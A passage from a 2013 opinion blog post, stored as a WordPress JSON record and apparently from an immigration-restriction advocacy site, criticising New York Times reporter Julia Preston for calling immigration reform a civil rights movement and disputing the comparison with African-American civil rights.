{"id":4853,"date":"2013-10-18T12:00:04","date_gmt":"2013-10-18T16:00:04","guid":{"rendered":"http:\/\/live-immigrationreform.pantheonsite.io\/?p=4853"},"modified":"2018-12-28T15:33:00","modified_gmt":"2018-12-28T20:33:00","slug":"media-biasnyts-top-immigration-reporter-makes-controversial-comment","status":"publish","type":"post","link":"https:\/\/www.immigrationreform.com\/2013\/10\/18\/media-biasnyts-top-immigration-reporter-makes-controversial-comment\/","title":{"rendered":"Media Bias\/NYT\u2019s Top Immigration Reporter Makes Controversial Comment"},"content":{"rendered":"<p>Julia Preston of the <i>New York Times<\/i>, arguably one of the nation\u2019s top immigration reporters, <a href=\"http:\/\/dailycaller.com\/2013\/10\/12\/new-york-times-reporter-calls-amnesty-for-illegal-immigrants-a-civil-right\/\">told a roundtable<\/a> gathered in Washington this past weekend that immigration reform is a \u201cvery substantial civil rights movement.\u201d Championing the amnesty cause is nothing new for the media, but Preston\u2019s comments suggesting that illegal aliens share the same civil rights struggle as African-Americans takes advocacy journalism to a new and offensive level.<\/p>\n<p>Linking illegal aliens to Black America\u2019s struggle for justice satisfies the media&#8217;s unending appetite for victim-hood stories but the parallels to the past are flawed. For the better part of our history, African Americans didn&#8217;t violate the law; rather the law violated <i>them<\/i> and their Constitutional rights as Americans. Yet now, illegal aliens freely violate the law and then demand to have the laws changed to accommodate their unlawful behavior. That\u2019s a big difference and making the \u201ccivil rights\u201d case for illegal aliens is, in effect, identity theft of the civil rights legacies of American black U.S. citizens.<\/p>\n<p>We won\u2019t hold our breath waiting for Jessie Jackson or Al Sharpton to cry &#8220;foul&#8221; but the voices of black Americans is growing louder. Why?
